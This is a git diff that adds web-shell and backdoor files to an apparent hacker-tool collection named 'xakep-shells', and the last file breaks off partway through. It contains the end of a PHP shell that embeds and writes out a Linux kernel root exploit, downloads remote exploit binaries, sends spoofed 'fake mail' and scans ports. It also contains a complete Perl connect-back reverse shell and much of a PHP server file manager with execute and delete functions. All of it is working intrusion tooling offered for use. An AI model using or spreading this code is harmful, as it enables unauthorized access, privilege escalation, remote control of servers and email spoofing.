+              "             }\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(m, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "      if (address)\n" .
+              "             return;\n" .
+              "      errno = ENOTSUP;\n" .
+              "      fatal(\"Unable to determine kernel address\");\n" .
+              "}\n" .
+              "int modify_ldt(int, void *, unsigned);\n" .
+              "void ldt(unsigned * m)\n" .
+              "{\n" .
+              "      struct modify_ldt_ldt_s l;\n" .
+              "      map(m);\n" .
+              "      memset(&l, 0, sizeof(l));\n" .
+              "      l.entry_number = LDT_ENTRIES - 1;\n" .
+              "      l.seg_32bit = 1;\n" .
+              "      l.base_addr = MAGIC >> 16;\n" .
+              "      l.limit = MAGIC & 0xffff;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      l.entry_number = ENTRY_MAGIC / 2;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      find(m);\n" .
+              "}\n" .
+              "asmlinkage void kernel(unsigned * task)\n" .
+              "{\n" .
+              "      unsigned * addr = task;\n" .
+              "      /* looking for uids */\n" .
+              "      while (addr[0] != uid || addr[1] != uid ||\n" .
+              "             addr[2] != uid || addr[3] != uid)\n" .
+              "             addr++;\n" .
+              "      addr[0] = addr[1] = addr[2] = addr[3] = 0;    /* uids */\n" .
+              "      addr[4] = addr[5] = addr[6] = addr[7] = 0;    /* uids */\n" .
+              "      addr[8] = 0;\n" .
+              "      /* looking for vma */\n" .
+              "      for (addr = (unsigned *) task_size; addr; addr++) {\n" .
+              "             if (addr[0] >= task_size && addr[1] < task_size &&\n" .
+              "                 addr[2] == address && addr[3] >= task_size) {\n" .
+              "                   addr[2] = task_size - PAGE_SIZE;\n" .
+              "                   addr = (unsigned *) addr[3];\n" .
+              "                   addr[1] = task_size - PAGE_SIZE;\n" .
+              "                   addr[2] = task_size;\n" .
+              "                   break;\n" .
+              "             }\n" .
+              "      }\n" .
+              "}\n" .
+              "void kcode(void);\n" .
+              "#define __str(s) #s\n" .
+              "#define str(s) __str(s)\n" .
+              "void __kcode(void)\n" .
+              "{\n" .
+              "      asm(\n" .
+              "             \"kcode:                                \\n\"\n" .
+              "             \"     pusha                            \\n\"\n" .
+              "             \"     pushl %es                        \\n\"\n" .
+              "             \"     pushl %ds                        \\n\"\n" .
+              "             \"     movl   $(\" str(DS) \") ,%edx      \\n\"\n" .
+              "             \"     movl   %edx,%es                  \\n\"\n" .
+              "             \"     movl   %edx,%ds                  \\n\"\n" .
+              "             \"     movl   $0xffffe000,%eax          \\n\"\n" .
+              "             \"     andl   %esp,%eax                 \\n\"\n" .
+              "             \"     pushl %eax                       \\n\"\n" .
+              "             \"     call   kernel                    \\n\"\n" .
+              "             \"     addl   $4, %esp                  \\n\"\n" .
+              "             \"     popl   %ds                       \\n\"\n" .
+              "             \"     popl   %es                       \\n\"\n" .
+              "             \"     popa                             \\n\"\n" .
+              "             \"     lret                             \\n\"\n" .
+              "      );\n" .
+              "}\n" .
+              "void knockout(void)\n" .
+              "{\n" .
+              "      unsigned * addr = (unsigned *) address;\n" .
+              "      if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
+              "             fatal(\"Unable to change page protection\");\n" .
+              "      errno = ESRCH;\n" .
+              "      if (addr[ENTRY_MAGIC] != MAGIC)\n" .
+              "             fatal(\"Invalid LDT entry\");\n" .
+              "      /* setting call gate and privileged descriptors */\n" .
+              "      addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
+              "      addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
+              "      addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
+              "      addr[ENTRY_DS+0] = 0x0000ffffU; /* user   4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
+              "      prepare();\n" .
+              "      if (setjmp(jmp) != 0) {\n" .
+              "             errno = ENOEXEC;\n" .
+              "             fatal(\"Unable to jump to call gate\");\n" .
+              "      }\n" .
+              "      asm(\"lcall $\" str(GATE) \",$0x0\");      /* this is it */\n" .
+              "}\n" .
+              "void shell(void)\n" .
+              "{\n" .
+              "      char * argv[] = { _PATH_BSHELL, NULL };\n" .
+              "      execve(_PATH_BSHELL, argv, environ);\n" .
+              "      fatal(\"Unable to spawn shell\\n\");\n" .
+              "}\n" .
+              "void remap(void)\n" .
+              "{\n" .
+              "      static char stack[8 MB];  /* new stack */\n" .
+              "      static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
+              "      static unsigned * m;\n" .
+              "      static unsigned b;\n" .
+              "      m = (unsigned *) sbrk(map_size);\n" .
+              "      if (!m)\n" .
+              "             fatal(\"Unable to allocate memory\");\n" .
+              "      environ = envp;\n" .
+              "      asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
+              "      b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
+              "      if (munmap((void*)b, task_size - b) == -1)\n" .
+              "             fatal(\"Unable to unmap stack\");\n" .
+              "      while (b < task_size) {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Unable to expand BSS\");\n" .
+              "             b += PAGE_SIZE;\n" .
+              "      }\n" .
+              "      ldt(m);\n" .
+              "      expand();\n" .
+              "      knockout();\n" .
+              "      shell();\n" .
+              "}\n" .
+              "int main(void)\n" .
+              "{\n" .
+              "      configure();\n" .
+              "      remap();\n" .
+              "      return EXIT_FAILURE;\n" .
+              "}\n";
+
+    $fp = fopen("/tmp/xpl_brk.c", "w");
+    $ok = fwrite($fp, $kernel);
+    
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
+    }
+  }
+
+?>
+</CENTER>
+<pre><font face="Tahoma" size="2">
+<?php
+
+// Function to Visualize Source Code files 
+if ($see != "") {
+  $fp = fopen($see, "r"); 
+  $read = fread($fp, 30000); 
+  echo "============== $see ================<br>";
+  echo "<textarea name=textarea cols=80 rows=15>"; 
+  echo "$read"; 
+  Echo "</textarea>"; 
+}
+
+// Function to Dowload Local Xploite Binary COde or Source Code
+
+if ($dx != "") {
+  $fp = @fopen("$hostxpl",r);
+  $fp2 = @fopen("$storage","w");
+  fwrite($fp2, "");
+  $fp1 = @fopen("$storage","a+");
+  for (;;) {
+    $read = @fread($fp, 4096);
+    if (empty($read)) break;
+    $ok = fwrite($fp1, $read);
+    
+    if (empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
+      break;
+    }
+  }
+
+  if (!empty($ok)) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
+  }
+}
+
+flush( );
+
+// Function to visulize Format Color Source Code PHP
+
+if ($sfc != "") {
+  $showcode = show_source("$sfc");
+  echo "<font size=4> $showcode </font>";
+}
+
+// Function to Visualize all infomation files
+if ($fileinfo != "") {
+  $infofile = stat("$fileanalize");
+  while (list($info, $value) = each ($infofile)) {
+    echo" Info: $info  Value: $value <br>";
+  }
+}
+
+// Function to send fake mail
+if ($fake == 1) {
+  echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
+  echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
+  echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
+  echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
+  echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
+  echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
+  echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
+  echo "</FORM>";
+}
+
+if($send == 1) {
+  if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
+  } else {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
+  }
+}
+
+if ($portscan != "") {
+  $port = array ("21","22","23","25","110",);
+  $values = count($port);
+  for ($cont=0; $cont < $values; $cont++) {
+    @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
+    $service = Getservbyport($port[$cont],"tcp");
+    @$get = fgets($sock[$cont]);
+    echo "<br>Port: $port[$cont] - Service: $service<br><br>";
+    echo "<br>Banner: $get <br><br>";
+    flush();
+  }
+}
+
+?> 
+</font></pre>
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt b/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt
new file mode 100644
index 0000000..2e34ca1
--- /dev/null
+++ b/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt	
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#IRAN HACKERS SABOTAGE Connect Back Shell          
+#code by:LorD
+#We Are :LorD-C0d3r-NT                                           
+#Email:LorD@ihsteam.com
+#
+#lord@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system    = '/bin/sh';
+$ARGC=@ARGV;
+print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
+if ($ARGC!=2) {
+   print "Usage: $0 [Host] [Port] \n\n";
+   die "Ex: $0 127.0.0.1 2121 \n";
+}
+use Socket;
+use FileHandle;
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n";
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush();
+open(STDIN, ">&SOCKET");
+open(STDOUT,">&SOCKET");
+open(STDERR,">&SOCKET");
+print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
+system($system);
+#EOF
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHP Shell.php.php.txt b/xakep-shells/PHP/PHP Shell.php.php.txt
new file mode 100644
index 0000000..0b1f12b
--- /dev/null
+++ b/xakep-shells/PHP/PHP Shell.php.php.txt	
@@ -0,0 +1,1010 @@
+<?php 
+
+/*
+*****************************************************************************************
+*                           PHPSHELL.PHP  BY MACKER     August 28th 2003                *
+***************************************************************************************** 
+*                                                                                       *  
+*   Welcome to Macker's PHPShell script...                                              * 
+*   This script will allow you to browse webservers etc...                              * 
+*   Just copy the file to your directory and open it in your Internet Browser.          * 
+*                                                                                       * 
+*   The webserver should support PHP...                                                 * 
+*                                                                                       * 
+*   You can modify the script if you want, but please send me a copy to:                *  
+*                               DRAZZ01@HOTMAIL.COM                                     * 
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !! 
+!!                Sites or even the server... You are responsible for your own deeds.  !! 
+!!                The admin of your webserver should always know you are using this    !!
+!!                script.                                                              !! 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";	/* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";	/* HTTP Authorisation password, uncomment if you want to use this */	    
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "PHPShell";
+$scriptident = "$scriptTitle by Macker";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+	$Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+	$Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "August 28th 2003";
+$scriptver = "Version 2.6.6dev";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+				"Edit" 		=> "edit.gif",
+				"Download" 	=> "download.gif",
+				"Upload" 	=> "upload.gif",
+				"Delete" 	=> "delete.gif",
+				"View" 		=> "view.gif",
+				"Rename" 	=> "rename.gif",
+				"Move" 		=> "move.gif",
+				"Copy" 		=> "copy.gif",
+				"Execute" 	=> "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+		$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+	else
+ 		$img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+	    setcookie("noauth","");
+	    Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+	    Header( "HTTP/1.0  401  Unauthorized");
+	    echo "Your username or password is incorrect";
+	    exit ;
+			     
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+	return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+	for ( $i = 0; $i < $mp; $i++ )
+		$ret .= "&nbsp;";
+	return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+	if (is_dir($Fdir)) {
+		$Fh=@opendir($Fdir);
+ 		while ($Fbuf = readdir($Fh))
+ 			if (($Fbuf != ".") && ($Fbuf != ".."))
+				Mydeldir("$Fdir/$Fbuf");
+		@closedir($Fh);
+				return rmdir($Fdir);
+	}	else {
+		return unlink($Fdir);
+	}
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+	$size = $insize;
+	$add = "B";
+	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "KB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "MB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "GB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "TB";
+ 	}
+ 	return "$size $add";
+}
+
+if ($cmd != "downl") {
+	?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body { font-size: 12px; 
+           font-family: arial, helvetica;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: white;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: white;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: white;
+            scrollbar-arrow-color: black;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{ font-size: 12px; 
+        font-family: arial, helvetical;
+        BORDER-LEFT: black 0px solid; 
+	BORDER-RIGHT: black 0px solid; 
+	BORDER-TOP: black 0px solid; 
+	BORDER-BOTTOM: black 0px solid; 
+	COLOR: black; 
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+ 		   BORDER-RIGHT: black 1px solid;
+ 		   BORDER-TOP: black 1px solid;
+ 		   BORDER-BOTTOM: black 1px solid;
+ 		 }
+    .none  {       BORDER-LEFT: black 0px solid;
+ 		   BORDER-RIGHT: black 0px solid;
+ 		   BORDER-TOP: black 0px solid;
+ 		   BORDER-BOTTOM: black 0px solid;
+ 		 }
+    .inputtext {
+		    background-color: #EFEFEF;
+		    font-family: arial, helvetica;
+		    border: 1px solid #000000;
+		    height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #E8E8E8;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: silver;
+			border: 1px solid #000000;
+			border-width: 1px;
+			height: 20;
+    }
+    .inputtextarea {
+		    background-color: #EFEFEF;
+		    border: 1px solid #000000;
+		    scrollbar-width: 5;
+		    scrollbar-height: 5;
+		    scrollbar-face-color: #EFEFEF;
+		    scrollbar-shadow-color: silver;
+		    scrollbar-highlight-color: #EFEFEF;
+		    scrollbar-3dlight-color:silver;
+		    scrollbar-darkshadow-color: silver;
+		    scrollbar-track-color: #EFEFEF;
+		    scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+ 	      BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: navy;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: silver; }
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ </HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP>
+    <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>
+	    <strong>
+		 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
+            </strong>
+       </center>
+      </td>
+     </tr>
+    </table><br>
+
+	<?php
+}
+
+if ( $cmd=="dir" ) {
+  	$h=@opendir($dir);
+ 	if ($h == false) {
+  		echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
+                THE SCRIPT WILL RESULT IN AN ERROR!!!
+                <br><br>".sp(3)."\n
+                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
+                <br><br></font>\n\n\n\n";
+ 	}
+        if (function_exists('realpath')) {
+		$partdir = realpath($dir);
+	}
+        else {
+		$partdir = $dir;
+	}
+ 	if (strlen($partdir) >= 100) {
+ 		$partdir = substr($partdir, -100);
+ 		$pos = strpos($partdir, "/");
+ 		if (strval($pos) != "") {
+ 			$partdir = "<--   ...".substr($partdir, $pos);
+ 		}
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+ 	}
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+	   <td width="100%" class="silver border">
+	    <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
+	   </td>
+	  </tr>
+	 </table>
+       <br>
+	 <table width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+           <td class="border nobottom noright">
+            &nbsp;Browsing:&nbsp;
+	  </td>
+          <td width="100%" class="border nobottom noleft">
+   	    <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+	  </td>
+	 </tr>
+	</table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+	  <td width="100%" NOWRAP class="silver border">
+	   &nbsp;Filename&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Size&nbsp;
+	  </td>
+          <td width=1 NOWRAP class="silver border noleft">
+	   &nbsp;Attributes&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Modification Date&nbsp;
+	  </td>
+	 <tr>
+    <?php
+
+
+      	/* <!-- This whole heap of junk is the sorting section... */
+
+ 	$dirn 	= array();
+ 	$filen 	= array();
+ 	$filesizes	= 0;
+ 	while ($buf = readdir($h)) {
+	    if (is_dir("$dir/$buf"))
+			$dirn[] = $buf;
+    		else 
+ 			$filen[] = $buf;
+    	}	 	
+		$dirno 	= count($dirn) + 1;
+ 		$fileno	= count($filen) + 1;
+
+  		function mycmp($a, $b){
+			if ($a == $b) return 0;
+			return (strtolower($a) < strtolower($b)) ? -1 : 1;
+		}
+
+		if (function_exists("usort")) {
+			usort($dirn, "mycmp");
+			usort($filen, "mycmp");
+		}
+		else {
+			sort ($dirn);
+	 		sort ($filen);
+	 	}
+	reset ($dirn);
+ 	reset ($filen);
+ 	if (function_exists('array_merge')) {
+		$filelist = array_merge ($dirn, $filen);
+	}
+ 	else {
+		$filelist = $dirn + $filen;
+	}
+
+	
+	if ( count($filelist)-1 > $Pmax ) {
+		$from = $Pidx * $Pmax;
+		$to = ($Pidx + 1) * $Pmax-1;
+		if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+			$to = count($filelist) - 1;
+		if ($to > count($filelist)-1)
+			$to = count($filelist)-1;
+		$Dcontents = array();
+		For ($Fi = $from; $Fi <= $to; $Fi++) {
+			$Dcontents[] = $filelist[$Fi];	
+		}
+
+	}
+	else {
+		$Dcontents = $filelist;
+	}
+	
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+	    reset($tdcolors);
+	    $tdcolor = arrval(each($tdcolors));	  }
+	  	         
+ 		if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+          			/* <!-- Dirname --> */
+			echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+  				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+ 				/* <!-- Rename --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+ 				/* <!-- Delete --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+				/* <!-- End of Actions --> */
+			echo "&nbsp;&nbsp;</center></td>\n";
+  				/* <!-- Size --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+ 			echo "<strong>D</strong>";
+		        if ( @is_readable("$dir/$file") ) {
+   				echo "<strong>R</strong>";
+ 			}
+ 			if (function_exists('is_writeable')) {
+				if ( @is_writeable("$dir/$file") ) {
+ 					echo "<strong>W</stong>";
+ 				}
+			}
+ 			else {
+    				echo "<strong>(W)</stong>";
+  			}
+  			if ( @is_executable("$dir/$file") ) {
+ 				echo "<Strong>X<strong>";
+ 			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+ 				/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+			echo "</tr>\n";
+
+        	}
+  		else { /* <!-- Then it must be a File... --> */
+     				/* <!-- Filename --> */
+			if ( @is_readable("$dir/$file") )
+ 				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+  			else
+  				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+  			   				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+ 				/* <!-- Rename --> */
+			echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+  				/* <!-- Edit --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 				echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+   				/* <!-- Copy --> */
+ 			echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+  				/* <!-- Move --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 					echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+    				/* <!-- Delete --> */
+			echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+ 				/* <!-- Download --> */
+			echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+ 				/* <!-- Execute --> */
+			if ( @is_executable("$dir/$file") )
+ 				echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+    				/* <!-- End of Actions --> */
+			echo sp(2)."</center></td>\n";
+ 				/* <!-- Size --> */
+			echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+ 			$size = @filesize("$dir/$file");
+ 			If ($size != false) {
+			        $filesizes += $size;
+				echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+			}
+			else
+				echo "&nbsp;&nbsp;<strong>0 B<strong>";
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+ 			if ( @is_readable("$dir/$file") )
+ 				echo "<strong>R</strong>";
+   			if ( @is_writeable("$dir/$file") )
+ 				echo "<strong>W</stong>";
+   			if ( @is_executable("$dir/$file") )
